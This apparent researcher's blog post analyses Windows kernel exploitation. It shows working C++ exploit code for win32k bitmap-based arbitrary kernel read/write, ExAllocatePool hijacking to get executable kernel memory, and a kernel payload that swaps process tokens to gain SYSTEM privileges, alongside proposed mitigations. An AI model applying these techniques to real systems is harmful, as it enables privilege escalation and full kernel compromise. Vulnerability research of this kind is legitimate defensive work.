NutShell of Kernel Security :

Cracks by Design ?

In our recent talk at REcon we targeted Windows kernel exploitation and introduced new techniques and a slightly different point of view on kernel exploitation & arbitrary kernel code execution. In this blog post I will elaborate on those approaches, their root causes, and why we chose to exploit things that way.

First I will define the terms :

By Code : relatively easy to fix; a kind of feature* adopted by some code, where a change does not affect the design of the OS

By Design : hard or even impossible to fix in the current implementation without refactoring a large code base (or redesigning from scratch), which is highly inefficient

*feature or bug ... depends on point of view

*except WINDOWS SECTION - TRICKING

KERNEL over the USER, or ... ?

Disclaimer : The goal of this blog post is not to criticise OS kernels, but to elaborate on some caveats in current implementations in order to prevent their future abuse. OS kernels continue to evolve and invent new mitigations, but there is still a long way to go.. No PC was harmed and no 0day was disclosed while writing these lines!

Note : In this blog post I assume that you have a kernel buffer overflow bug, or another bug which can be turned into a buffer overflow. Throughout the post I use a Windows kernel object as the example, but the mindset / way / idea is generic* to some other OSes (f.e. Linux) and applicable there as well.

When it comes to kernel and user mode, these should be two separate worlds, where an unprivileged user has almost zero knowledge of, and really *little* control over, kernel state. Unfortunately, in many OSes that is often not the case...

Kernel Objects :

Reside in the kernel pool

Used to preserve some state

Hold some other data as well

Weak points :

Many times the allocation is reachable from usermode at the user's will

Many times the size of the object is controllable by the user as well

Many times the object holds data controlled by the user

Consequences : Pool Spray, Pool Layout, user:kernel data = 1:1
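To make the "Pool Layout" consequence concrete, here is a small user-mode toy model. It is only a sketch under loud assumptions: ToyPool is a hypothetical first-fit allocator over fixed-size slots with no randomization, and it has nothing to do with the real Windows pool manager. It shows why an allocator that always reuses the same hole lets the caller predict the neighbours of the next allocation.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

// Toy first-fit allocator over fixed-size slots; a hypothetical stand-in for a
// pool without randomization, NOT the real Windows pool manager.
class ToyPool
{
public:
    explicit ToyPool(size_t slots) : m_used(slots, false) {}

    // Returns the index of the lowest free slot, or -1 when the pool is full.
    int Alloc()
    {
        for (size_t i = 0; i < m_used.size(); i++)
        {
            if (!m_used[i])
            {
                m_used[i] = true;
                return static_cast<int>(i);
            }
        }
        return -1;
    }

    void Free(int slot)
    {
        assert(slot >= 0 && static_cast<size_t>(slot) < m_used.size());
        m_used[static_cast<size_t>(slot)] = false;
    }

private:
    std::vector<bool> m_used;
};

// Spray the pool, punch one hole, and report where the next allocation lands.
// With a deterministic allocator the answer is always the hole itself, so the
// neighbours of the new object are known in advance.
inline int SlotAfterSprayAndHole(size_t slots, int hole)
{
    ToyPool pool(slots);
    for (size_t i = 0; i < slots; i++)
        pool.Alloc();      // spray: fill every slot
    pool.Free(hole);       // make exactly one hole
    return pool.Alloc();   // the next allocation of that size
}
```

A randomizing allocator would break exactly this property: the returned slot would no longer be a function of the spray and the hole alone.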



A shiny example is win32k!_GRE_BITMAP, which resides in kernel session space and has a documented API.

Documentation from the attacker's point of view #1 - By Code *PoolControl* :

CreateBitmap : kmalloc(size)

DeleteObject : kfree(size)

A very nasty feature of win32k!_GRE_BITMAP is that its size can be small (less than PAGE_SIZE) as well as large. And, sadly for Windows, *big* pool memory management does not implement randomization there (or it really sucks). But why do we even bother ?

Because you can build a very *very* precise & stable PoolLayout! To be fair, even on a kernel with randomization in place for big pools you can overcome it and build a PoolLayout as well, but as I discussed at CONFidence this year...

..it is far harder and far less reliable!

One big advantage of pool (buffer) overflows is that other bug classes (such as race conditions, integer over/underflows, TOCTOU, OOB, ...) can often be turned into a buffer overflow, which makes the overflow a very universal entry point. And for overflows you can implement generic techniques based on the size of the memory chunk and the type of pool, which turns overflows into a very mighty way to go.

What was proposed* at my talk at SyScan :

Encrypt object state

Per object integrity

use x64 address space "imbalance"

[ rnd*no_access ] [ rnd space ] [ *pool object* ] [ padding ] [ rnd*no_access ]

Encrypt object state : { members, pointers } [ not only the metadata of the memory chunk ]

Per object integrity : use an object-specific canary to protect against UAF and against blind rewriting / leaking from / to usermode, ..

use x64 address space "imbalance" (virtual vs physical) : exploit it to a greater extent with PAGE_NOACCESS, a PageHeap-like approach, but with more pages involved and randomization per (big & arrays & ..) allocation
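The first two proposals can be sketched in a few lines of user-mode C++. This is a minimal illustration, not a kernel design: ObjectSecrets, ProtectedObject and SimulateOverflow are hypothetical names, XOR stands in for whatever encoding a real implementation would pick, and the secret is stored inline only to keep the toy self-contained.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical per-boot secrets; a real kernel would draw them from a CSPRNG
// at startup and keep them out of reach of user mode.
struct ObjectSecrets
{
    uint64_t key;     // XOR key for members / pointers
    uint64_t canary;  // base value for the per-object canary
};

// Toy object whose members are never stored in plain form.
class ProtectedObject
{
public:
    ProtectedObject(const ObjectSecrets& s, uint64_t width, uint64_t data_ptr)
        : m_secrets(s)
    {
        m_width = Encode(width);
        m_data = Encode(data_ptr);
        m_canary = ExpectedCanary();
    }

    // False when the stored canary does not match, i.e. the object was
    // overwritten blindly (overflow) or reused (UAF) without the secret.
    bool Validate() const { return m_canary == ExpectedCanary(); }

    uint64_t Width() const { assert(Validate()); return Decode(m_width); }
    uint64_t Data() const { assert(Validate()); return Decode(m_data); }

    // Test hook that simulates a linear overflow writing attacker bytes.
    void SimulateOverflow(uint64_t filler)
    {
        m_width = filler;
        m_data = filler;
        m_canary = filler;
    }

private:
    // Mix in the object address so the same value encodes differently per object.
    uint64_t Salt() const { return m_secrets.key ^ reinterpret_cast<uintptr_t>(this); }
    uint64_t Encode(uint64_t v) const { return v ^ Salt(); }
    uint64_t Decode(uint64_t v) const { return v ^ Salt(); }
    uint64_t ExpectedCanary() const { return m_secrets.canary ^ Salt() ^ m_width ^ m_data; }

    ObjectSecrets m_secrets;  // inline only to keep the toy self-contained
    uint64_t m_width;
    uint64_t m_data;
    uint64_t m_canary;
};
```

The point of the design is that an overflow which does not know the secret can neither plant a chosen width / pointer nor keep the canary consistent, so the plain "I know the exact value" assumption no longer holds.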

You can also abstract the pool object into a "pool". That means a concept fairly similar to the current pool separation, but with improved granularity. Every pool would hold only specified objects (kernel caches on Linux, or an IsolatedHeap-like approach), preferably as few kinds as possible, with separate pools for objects which are more likely to be overflowed from (arrays, buffers).

* links :

Encoding and Decoding Function Pointers

Back to the CORE (7 - 12)

I consider encrypting object state (structs, class members, vtables, pointers) a crucial part, as it can move exploitation from very easy to hard. As I stated previously, the user should have almost zero knowledge about kernel mode state. But let's take a closer look at f.e. the win32k!_GRE_BITMAP header (I chose it as the example for this blog post, but the same applies to other objects in Windows or other OSes as well) :

#pragma once

#include <cstddef>
#include <cstdint>

#include "UndocHolder.h"
#include "../usr_common.h"

// Simplified accessor view of the undocumented win32k!_GRE_BITMAP header.
struct _GRE_BITMAP :
    private CUndocHolder
{
    uint32_t& Width();
    uint32_t& Height();
    void*& Head();
    void*& Curr();
    static size_t StructSize();
};

we can see very useful information there (I simplified it to pinpoint only some members), so zero knowledge is not the case in current kernels. You can make important assumptions about the "unknown" state :

Plain *pointers*

you can overwrite it with another pointer (function / buffer / ...)

you can use it to overwrite f.e. addr_limit / MmUserProbeAddress

you know that its base is in some range (depends on the pool)

you know that it (should) point to a valid location

you know that it (should) point to a specific location

...

Plain *members*

you know the exact value!

you can substitute the member with your own and precisely control the state of the object



This somewhat undermines the effectiveness of SMAP. In the SMAP era (already implemented in some OSes, not yet in others) you cannot reference usermode memory directly, but when you introduce memory in the kernel that is controllable or easy to guess / predict by the user, it opens a kind of backdoor to misuse.

Documentation from the attacker's point of view #2 - By Design *fullKernelIo* :

SetBitmapBits : FullKernelIo.Write

GetBitmapBits : FullKernelIo.Read

In other words, when you have a buffer overflow (at least with a semi-controlled overflow "what") that is able to overflow into a bitmap / cool object (reachable size / height / width), it is trivial to turn it into *FullKernelIo*!

It may not be visible at first look, but consider this implementation :

protected:
    // we already overflowed into m_bitmapPoolIo;
    // from m_bitmapPoolIo we can alter the following m_bitmapFullIo
    template<bool WRITE>
    inline
    bool
    Io(
        __in_bcount(size) void* addr,
        __inout_bcount(size) void* buff,
        __in size_t size
        )
    {
        // redirect the following bitmap: new data pointer, maximal dimensions
        m_bitmap->Curr() = addr;
        m_bitmap->Width() = -1;
        m_bitmap->Height() = -1;

        // overflow into the following win32k!_GRE_BITMAP header
        size_t size_delta = &m_bitmap->Height() - m_bitmap->JunkBegin() + sizeof(m_bitmap->Height());
        auto sz = SetBitmapBits(m_bitmapPoolIo, size_delta, m_bitmap->JunkBegin());
        if (sz != size_delta)
            return false; // that hurts ...

        // the redirected bitmap now reads / writes at addr
        return (size == (WRITE ?
            SetBitmapBits(m_bitmapFullIo, size, buff) :
            GetBitmapBits(m_bitmapFullIo, size, buff)));
    }

That is pretty bad, especially when you realise that to reach this state it is enough to flip one bit (0 to 1) in the width or height (of course one bit from the X part of 0xXXXXXX00) to be able to reach the following header, and then from one win32k!_GRE_BITMAP you can control another! And that's it! This is almost the end of your journey in exploitation when it comes to simply escalating privileges to SYSTEM.

For escalating privileges, the cleaner solution is to *not step* into the kernel at all, as it is kind of overkill: you would then have to deal with SMEP, SMAP, NonExec (and later CFG-like mitigations), etc., and that *should* be hard. But once you achieve full kernel IO (as you can see from the code snippet), the only thing you need is to leak the nt!_EPROCESS pointer of your own process and update your token (for example by copying the one from the system process). And you are done without dealing with any additional kernel protection!
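The two-object pattern can be modelled entirely in user mode, which makes the logic easier to follow than the kernel snippet. The sketch below is a toy under stated assumptions: "memory" is a byte vector, "pointers" are offsets into it, and ToyHeader, ToyArena and ToyFullIo are hypothetical names that only mimic the size / data-pointer relationship described above.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical header: how many bytes the object owns and where they live.
struct ToyHeader
{
    uint32_t size;  // bytes the object believes it owns
    uint32_t data;  // offset of its buffer inside the arena
};

class ToyArena
{
public:
    explicit ToyArena(size_t bytes) : m_mem(bytes, 0) {}

    // Place a header at `at`, with its buffer directly behind the header.
    void Create(uint32_t at, uint32_t size)
    {
        assert(at + sizeof(ToyHeader) + size <= m_mem.size());
        Store(at, ToyHeader{ size, at + static_cast<uint32_t>(sizeof(ToyHeader)) });
    }

    ToyHeader Load(uint32_t obj) const
    {
        ToyHeader h;
        std::memcpy(&h, &m_mem[obj], sizeof(h));
        return h;
    }

    void Store(uint32_t obj, const ToyHeader& h)
    {
        std::memcpy(&m_mem[obj], &h, sizeof(h));
    }

    // Analogue of SetBitmapBits: trusts the header, clamps only to header.size.
    bool SetBits(uint32_t obj, const void* src, uint32_t len)
    {
        const ToyHeader h = Load(obj);
        if (!InBounds(h, len))
            return false;
        std::memcpy(&m_mem[h.data], src, len);
        return true;
    }

    // Analogue of GetBitmapBits.
    bool GetBits(uint32_t obj, void* dst, uint32_t len) const
    {
        const ToyHeader h = Load(obj);
        if (!InBounds(h, len))
            return false;
        std::memcpy(dst, &m_mem[h.data], len);
        return true;
    }

private:
    // The arena bound is what keeps this toy memory-safe.
    bool InBounds(const ToyHeader& h, uint32_t len) const
    {
        return len <= h.size && static_cast<uint64_t>(h.data) + len <= m_mem.size();
    }

    std::vector<uint8_t> m_mem;
};

// Two-step primitive: `manager` (whose size field was enlarged by the initial
// bug) rewrites the header of the adjacent `worker`, then `worker` does the IO.
inline bool ToyFullIo(ToyArena& arena, uint32_t manager, uint32_t worker,
                      uint32_t addr, void* buf, uint32_t len, bool write)
{
    assert(worker >= arena.Load(manager).data);
    const uint32_t gap = worker - arena.Load(manager).data;  // manager's own bytes
    std::vector<uint8_t> junk(gap + sizeof(ToyHeader));
    if (!arena.GetBits(manager, junk.data(), static_cast<uint32_t>(junk.size())))
        return false;  // manager cannot reach the worker header
    const ToyHeader redirected{ 0xFFFFFFFFu, addr };
    std::memcpy(&junk[gap], &redirected, sizeof(redirected));
    if (!arena.SetBits(manager, junk.data(), static_cast<uint32_t>(junk.size())))
        return false;
    return write ? arena.SetBits(worker, buf, len)
                 : arena.GetBits(worker, buf, len);
}
```

With a sane manager size the helper fails at the first step; once the size field is enlarged so that it covers the neighbouring header, every later read or write goes wherever the rewritten data offset points. That is the whole "one field wrong, full IO" argument in miniature.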

Leaking nt!_EPROCESS is not even a challenge, as you have _sidt / _sgdt and, sadly, the even easier user!gSharedInfo. I label the difference between those two approaches as By Design *hardware* and By Code *fail*. _sidt / _sgdt does not seem easy to deal with (at least some pointer mangling ?) in order to mitigate its use in exploitation. As for user!gSharedInfo, it is just ridiculous, and I really believe it will be stripped out as soon as possible; I was naive enough to think that this kind of information leak had reached its end after being covered by a nice presentation by Alex. This is directly connected to another problem, because nowadays FullKernelIo is everything you need, and, to be a bit poetic like Alex, you can find 99* ways to achieve FullKernelIo.

* and more :)

Side note : In a secure OS, FullKernelIo should give you almost *nothing* helpful without an additional *info-leak bug*! You now have an x64 virtual address space which is much wider than the physical address space, and you also have KASLR (at the virtual address space level). That *should* mean that you have FullKernelIo but cannot use it as it is, because you will most likely panic with an access violation as you try to read / write at random. As I said, this situation can most likely be solved in a security-oriented OS as well, by an additional info-leak bug or by using overflows (but overflows should be mitigated to a big extent too :). But that is a far more complicated way to go!
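A rough back-of-the-envelope helper makes the "much wider" argument tangible. The numbers in the usage note are assumptions chosen for illustration (a 47-bit kernel half of the address space and 16 GiB of mapped memory), and BlindHitProbability is a hypothetical name; the sketch only computes an upper bound on the chance that one blind access lands on something mapped.

```cpp
#include <cassert>
#include <cstdint>

// Upper bound on the fraction of a virtual address range that is backed by
// memory at all. `va_bits` is the size of the range as a power of two,
// `mapped_bytes` an upper bound on what is mapped (for example physical RAM).
inline double BlindHitProbability(uint64_t mapped_bytes, unsigned va_bits)
{
    assert(va_bits > 0 && va_bits < 64);
    const double range = static_cast<double>(uint64_t{1} << va_bits);
    const double p = static_cast<double>(mapped_bytes) / range;
    return p > 1.0 ? 1.0 : p;
}
```

Under those assumptions, BlindHitProbability(16 GiB, 47) is 2^34 / 2^47 = 1 / 8192, so a random guess faults far more often than it hits, provided nothing leaks where the mapped ranges are.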

GOAL : KERNEL EXEC

Now imagine that you have FullKernelIo (let's say it is not so unimaginable to achieve :) ) but you are not satisfied with a system calc / process, and you want to install a kernel driver. It is very important to mention here that, just as we pay attention to sandboxed processes in order to keep a distinct and large gap between a low-privileged process and an admin-elevated process, the same applies to an administrator process vs a kernel mode driver! (and then supervisor vs hypervisor, etc.) In the case of a kernel mode driver you now have to challenge either KernelSigningDriverEnforcement or { SMEP, SMAP, NonExec (let's say CFG as well) }. Obviously (+-) the second group of challenges makes our lives easier.

For dealing with SMEP, SMAP and NonExec there are some known options, especially when you have FullKernelIo.

Find a RWE page : I rate this as By Code *obsolete*, as pages of this kind should already be extinct, but in reality that is not the world we are living in. As a recent example there was the nice j00ru attack; Alex proposed some targets and wrote a nice article with some solutions & proposals; I proposed another RWE page in a LinkList-related talk, and many other guys did so even before.

Abuse page tables : @__x86, @aionescu, @zer0mem - mess with the PTE for particular page/s

Misuse behaviour of VadRoot / task_struct->mm : as EPT / TrustZone / ... may prevent you from altering the page table directly, you can instead introduce a new node describing your own memory into this list. Give the node the desired RWE privileges; then you just need to trigger an ACCESS_VIOLATION by touching the page described by your node, which invokes the page fault handler, and it adds the desired entry to the page table, voilà! More on that approach and how it is exploitable in my SyScan talk.
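Since all three options revolve around what a page table entry says about a page, a short decoder may help. The bit positions are the architectural x86-64 ones for a 4 KiB leaf entry (P, R/W, U/S and the XD / NX bit 63); the helper names PteView, MakePte, DecodePte and IsKernelRwe are hypothetical and exist only for this sketch.

```cpp
#include <cassert>
#include <cstdint>

// Architectural x86-64 page-table entry bits (4 KiB leaf entries).
constexpr uint64_t kPtePresent  = 1ull << 0;   // P
constexpr uint64_t kPteWritable = 1ull << 1;   // R/W
constexpr uint64_t kPteUser     = 1ull << 2;   // U/S
constexpr uint64_t kPteNoExec   = 1ull << 63;  // XD / NX (honoured when EFER.NXE is set)

struct PteView
{
    bool present;
    bool writable;
    bool user;
    bool executable;
};

// Builds a present entry for the given page frame number, for experiments.
inline uint64_t MakePte(uint64_t pfn, bool writable, bool user, bool executable)
{
    assert(pfn < (1ull << 40));  // the frame number lives in bits 12..51
    uint64_t pte = kPtePresent | (pfn << 12);
    if (writable)
        pte |= kPteWritable;
    if (user)
        pte |= kPteUser;
    if (!executable)
        pte |= kPteNoExec;
    return pte;
}

inline PteView DecodePte(uint64_t pte)
{
    return PteView{ (pte & kPtePresent) != 0,
                    (pte & kPteWritable) != 0,
                    (pte & kPteUser) != 0,
                    (pte & kPteNoExec) == 0 };
}

// A kernel RWE page: present, writable, supervisor-only and executable.
inline bool IsKernelRwe(uint64_t pte)
{
    const PteView v = DecodePte(pte);
    return v.present && v.writable && !v.user && v.executable;
}
```

From the defender's side the same predicate is an audit rule: any leaf entry for which IsKernelRwe returns true is a page that W^X hardening is supposed to eliminate.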



But as I am a hater of shellcode, and RWE pages will (... should ... hopefully could ...) sooner or later be eliminated, with TrustZone / EPT / .. in place and VadRoot / mm handled, I will choose another solution (see WINDOWS SECTION - TRICKING).

STACK HOOKING

Once you get a RWE page and FullKernelIo, you need to ship your code to the kernel and jump to the selected entry point of your kernel mode code. Pretty easy, when there is no additional hardening in your way! But we know there are already some mitigations in place, not so widespread in kernels yet, but hopefully they will be soon!

CFG : protects indirect calls (and provides additional functionality as well). It prevents the early stage of ROP (and redirection to non-registered functions in general) at protected places such as indirect calls. That can be a problem for us, because when we want to take over control flow in the kernel, we will need to use an indirect call* (/interrupt)!

Or we can do it in a different way, as *any* RW instruction can access our stack, and our stack is a magic box where data and control flow information are mixed! In that case every CFI solution (that I am able to think of now) will be imperfect By Design *STACK*. The root cause is, as I mentioned, that any RW instruction can access our stack. That can be solved by a separate control flow stack, which can be achieved most efficiently with hardware support, but that is not likely to happen soon :\ though I hope that some day, in a bright security future, it will ...

In addition, as I was trying to challenge myself during exploitation, I imagined that CFG is enabled across the whole kernel, and reflected that in WINDOWS SECTION - TRICKING, where a function-driver-attack (FDA) is implemented that should bypass CFG. CFG uses a bitmap for registering valid call targets, and in my FDA attack I used simple one-purpose functions, so it is possible that they will not be registered in that bitmap (hopefully they will not be there). In that case you will need other functions, chained together to get the same results. When it comes to kernel exploitation, once you achieve FullKernelIo (and again, it is easily achievable) you can most likely overwrite function pointers multiple times and invoke particular syscalls multiple times as well, so invoking different routines for a given purpose is not a problem. It means you will *not* achieve your goal with *one* system call of chained ROP; you will need more syscalls to achieve your goal step by step** instead.

I talked about this topic at SyScan this year, and at the same time the vfgadgets approach (sharing a similar base idea) was presented - very nice paper!

*unless you are able to modify the image of some driver - PageTables, but be aware of PatchGuard & hardware mechanisms in the future

** side note : a nice example of changing state step by step is The M/o/Vfuscator - good to read, it can expand your way of thinking ;)
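The bitmap idea behind CFG can be shown with a toy model. This is a deliberate simplification: one bit per 16-byte slot of a single code region, with the hypothetical names ToyCfgBitmap, RegisterTarget and IsValidTarget; the real CFG bitmap has a richer encoding and covers the whole address space.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Toy model of a CFG-style check: one bit per 16-byte slot of a code region.
class ToyCfgBitmap
{
public:
    ToyCfgBitmap(uint64_t base, uint64_t size)
        : m_base(base), m_size(size), m_bits((size + 15) / 16, false)
    {
        assert(base % 16 == 0);
    }

    // Called for every function that is a legitimate indirect call target.
    void RegisterTarget(uint64_t address)
    {
        assert(Contains(address) && address % 16 == 0);
        m_bits[(address - m_base) / 16] = true;
    }

    // Conceptually what runs before an instrumented indirect call.
    bool IsValidTarget(uint64_t address) const
    {
        return Contains(address)
            && address % 16 == 0
            && m_bits[(address - m_base) / 16];
    }

private:
    bool Contains(uint64_t address) const
    {
        return address >= m_base && address - m_base < m_size;
    }

    uint64_t m_base;
    uint64_t m_size;
    std::vector<bool> m_bits;
};
```

Note what the check does not see: it is consulted only at instrumented indirect calls. A plain data write that changes a return address on the stack never passes through IsValidTarget, which is the By Design *STACK* gap described above.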

SafeMemory (not in kernel .. yet?) : Meanwhile, some very nice research is coming out, recognized by some as the way to go, with which I totally agree! This approach tries to protect function pointers in general (stack & vtables) by separating them into safe memory that is accessible only in a special way (on x86 via segment registers). That means a memcpy, or our FullKernelIo.Write, will not affect a protected function pointer! You can find a nice paper on this research here! and a bunch more information at dslab
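The core idea can be sketched without any hardware support. In the toy below the real code pointer lives in a separate store keyed by the address of the slot that would normally hold it, and the slot's own content is never trusted. SafeStore, Widget, Smash and Dispatch are hypothetical names, and an ordinary map stands in for the isolated safe region of the actual research.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>
#include <unordered_map>

using Handler = int (*)(int);

// Toy "safe region": the real code pointer is keyed by the address of the slot
// that would normally hold it. In the research this region is isolated from
// ordinary loads and stores; here it is just a separate map.
class SafeStore
{
public:
    void Set(const void* slot, Handler fn) { m_ptrs[slot] = fn; }

    Handler Get(const void* slot) const
    {
        auto it = m_ptrs.find(slot);
        return it == m_ptrs.end() ? nullptr : it->second;
    }

private:
    std::unordered_map<const void*, Handler> m_ptrs;
};

struct Widget
{
    char name[16];
    uintptr_t handler_slot;  // ordinary memory; its content is never trusted
};

inline int Twice(int x) { return 2 * x; }

// Simulates a linear overwrite of the whole object (memcpy, FullKernelIo.Write).
inline void Smash(Widget& w) { std::memset(&w, 0x41, sizeof(w)); }

// Indirect call that resolves its target through the safe store only.
inline int Dispatch(const SafeStore& store, const Widget& w, int arg)
{
    Handler fn = store.Get(&w.handler_slot);
    assert(fn != nullptr);
    return fn(arg);
}
```

After Smash the widget is full of attacker bytes, yet Dispatch still calls the registered handler, because the write never reached the place where the pointer really lives.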



WINDOWS SECTION - TRICKING

On Windows, allocations work in this way :

In addition you have the x64 calling convention, so @rcx and @rdx are used for the arguments (on Intel). The first thing to understand is that it does not matter what @rcx & @rdx were supposed to be before the call; in ExAllocatePool they will always be interpreted as Flag & Size!

The idea here is to not mess with the PageTable in any way, but to allocate our own RWE page by ourselves (*from user mode). Here you face a few "how to" problems :

call this routine

leak base of allocation back to user

provide correct arguments to this routine (flags & size)

You have already achieved FullKernelIo, so in this case you need to find an appropriate RWE function pointer (/vtable) and exchange it with the ExAllocatePool function pointer. In addition, this function pointer must be callable from user mode (via a syscall, somewhere in the caller chain). There are some other options for this (HalDispatchTable, interrupt table, ..), but let's take a look at another candidate, the NtUserMessageCall routine :



as you can see, a virtual call is invoked in this routine, so let's go deeper :



it has a RW function table and, as a bonus, it is stored in the win32k .data section, which means you can locate it very easily! It is also almost directly callable from user mode :



One of the reasons why I chose this routine was that it provides really simplistic wrapping around the virtual call.



It invokes the virtual call and hands the output back to the user!

As I mentioned already, it is pretty neat that you can call ExAllocatePool now, but the crucial point for success is to provide the correct arguments. The size is the second argument and is passed directly to the syscall, so the problem remains only for FLAGS. And as you can see here :



it is almost not controlled, because it is a WINDOW pointer! But now comes a bit of cheating because, as I previously stated, for ExAllocatePool it does not matter that it is a pointer; it will be interpreted as a flag. For ExAllocatePool these flags matter :

typedef enum _POOL_TYPE {
    NonPagedPool,
    NonPagedPoolExecute = NonPagedPool,
    PagedPool,
    NonPagedPoolMustSucceed = NonPagedPool + 2,
    DontUseThisType,
    NonPagedPoolCacheAligned = NonPagedPool + 4,
    PagedPoolCacheAligned,
    NonPagedPoolCacheAlignedMustS = NonPagedPool + 6,
    MaxPoolType,
    NonPagedPoolBase = 0,
    NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2,
    NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4,
    NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6,
    NonPagedPoolSession = 32,
    PagedPoolSession = NonPagedPoolSession + 1,
    NonPagedPoolMustSucceedSession = PagedPoolSession + 1,
    DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1,
    NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1,
    PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1,
    NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1,
    NonPagedPoolNx = 512,
    NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4,
    NonPagedPoolSessionNx = NonPagedPoolNx + 32
} POOL_TYPE;

we are looking for NonPagedPool with EXEC (NonPagedPool* ^ NonPagedPoolNx)! The next point is that the WINDOW pointer is translated from a WINDOW HANDLE, and this handle is provided to our syscall as well, so we can control it (+-)!
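Read against the enum, the requirement boils down to two bit tests on whatever value ends up in the first argument. The sketch below is an assumption-heavy illustration: it assumes that "paged" is decided by bit 0 (PagedPool = 1) and "no-execute" by the NonPagedPoolNx bit (512), as the enum values suggest, and that only the low 32 bits are looked at. LooksLikeExecNonPaged is a hypothetical name and is not the IsWindowHandleRweFlag helper used later in this post, whose body is not shown.

```cpp
#include <cassert>
#include <cstdint>

// Bit values taken from the POOL_TYPE enum quoted above.
constexpr uint32_t kPagedBit = 1;    // PagedPool
constexpr uint32_t kNxBit    = 512;  // NonPagedPoolNx

// ASSUMPTION: the value is truncated to 32 bits and only the two bits above
// decide between paged / non-paged and executable / no-execute.
inline bool LooksLikeExecNonPaged(uint64_t first_argument)
{
    const uint32_t type = static_cast<uint32_t>(first_argument);
    return (type & kPagedBit) == 0 && (type & kNxBit) == 0;
}
```

For example, NonPagedPool (0) and NonPagedPoolSession (32) pass the test, while PagedPool (1) and NonPagedPoolNx (512) do not; a pointer-sized value passes or fails purely on its bit 0 and bit 9.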

OK, so now we can do multiple allocations and hope that one of them will be RWE ? How do we find out whether it is RWE (OK, we can take a look at its PTE) ? Yeah, that can be a solution, but it is kind of overkill in comparison with recursive cheating!

Recursive cheating ? Let's imagine that what we did with ExAllocatePool, we do with another function



What is this ? It in fact returns "arg1 + const". Do you get my point ?

It may not be too straightforward to see through, so let's repeat our current problem with ExAllocatePool : the lack of ability to provide a controlled Flag argument (we want the RWE flag & NonPaged), because the first argument is a WINDOW pointer translated from a WINDOW HANDLE. In other words, achieving ExAllocatePool(RWE + NonPaged, Size) is equivalent to knowing the translation from WINDOW HANDLE to WINDOW pointer (which must be the desired Flags).

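__checkReturn
CWindow*
GetRweWindowHandle()
{
    wlist w_list;
    CWindow* wnd = nullptr;
    for (size_t i = 0; i < 0xFFFF; i++)
    {
        // unique window name: i written as hex digits, null-terminated
        wchar_t name[5] = { 0 };
        for (size_t j = 0, val = i; j < _countof(name) - 1; j++, val /= 0x10)
            name[j] = static_cast<wchar_t>((val % 0x10) > 9 ? ('A' + (val % 0x10) - 10) : ('0' + (val % 0x10)));

        wnd = new CWindow(name);
        if (!wnd)
            break;

        // stop at the first window whose kernel pointer reads as the wished flags
        if (IsWindowHandleRweFlag(wnd->Hwnd()))
            return wnd;

        // keep the rejected windows alive so the same slot is not handed out again
        w_list.push_back(*wnd);
    }
    return nullptr;
}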

If it is still not clear, then think it through again and pay close attention to the code snippet.

hint : PsGetProcessImageFileName is a bit misused

Yeah, it is kind of tricking / cheating, but it is always like this when it comes to messing with the logic of some machine state - exploitation...

WRAP UP

We achieved important checkpoints :

FullKernelIo

controlled RWE kmalloc

and the complexity of exploitation so far :

*1 overflow on the session pool in this example, but as I stated before there are similarly powerful objects in other pools as well (maybe one of the todo blog posts)

*2 overflow or ANY bug CONVERTIBLE to an overflow*

Kernel Code Execution - Kernel mode driver

And now it is time to party at ring0 with ACE (arbitrary code exec)! I already mentioned that I do *not* like shellcoding, but to avoid it you need to have some technology.. And as we have already published our CC-SHELLCODING framework, you have it too!



So let's take a look at our kernel mode *driver* payload - shellcode free!

void
DoEscape()
{
    auto packet = static_cast (CKernelModule::Param());
    CProcessById proc2boost(packet->ToSystemBoostProcId);
    if (!proc2boost.Get())
        return;

    printf("\nPing from Kernel! PsGetCurrentProcess() => %p\n", PsGetCurrentProcess());

    CTokenBoost sys_token(PsGetCurrentProcess());
    sys_token.ImpersonateProcess(proc2boost.Get());
}

class CTokenBoost
{
    CScopedObjHandle m_leader;
public:
    CTokenBoost(
        __in void* process
        ) : m_leader(static_cast (process))
    {
    }

    void
    ImpersonateProcess(
        __in void* proc2boost
        )
    {
        auto eproc = static_cast<_EPROCESS*>(proc2boost);
        if (!BoostToken(eproc))
            eproc->Token() = m_leader->Token(); // ufff, something goes wrong ?!
    }

protected:
    __checkReturn
    bool
    BoostToken(
        __in _EPROCESS* proc2boost
        )
    {
        CDerefHandle token(DuplicateToken());
        if (!token.get())
            return false;

        CScopedHandleObj token_obj(token.get(), GENERIC_READ);
        if (!token_obj.get())
            return false;

        // kinda hacky, but seems NtSetInformationProcess => 0xc00000bb a.k.a not supported
        proc2boost->Token() = token_obj.release(); // dont decrease reference count!!
        return true;
    }
};

Features

c++ kernel mode code

own DRIVER_OBJECT (ioctl, etc...)

compiled & developed with your user mode code

easy installation

TODO

register our kernel module to driver list (as callback functions will refuse its usage without)

As I already mentioned in the feature list, your file is composed of user mode & kernel driver code sharing the same code base, so there is no need to attach kernel code as a resource or hardcode it into the binary; it is developed directly with your user mode code (for more info check the cc-shellcoding framework)! And by easy installation I mean that you just copy your PoC (*user mode PE*) image to the kernel :

FullKernelIo.Write(kmalloc(POC_PE.Size), POC_PE.Base, POC_PE.Size)

and jump to a different entry point of your binary (stack hooking is the preferable choice if CFG gets enabled in the future)!

ACE(POC_PE.KernelModeEntry);

At the end of our blog post we are releasing a sneak peek of our win32k escape code; more code will follow in the next blog posts, enjoy!

btw. in case you like this blog post, do not hesitate to share it ;)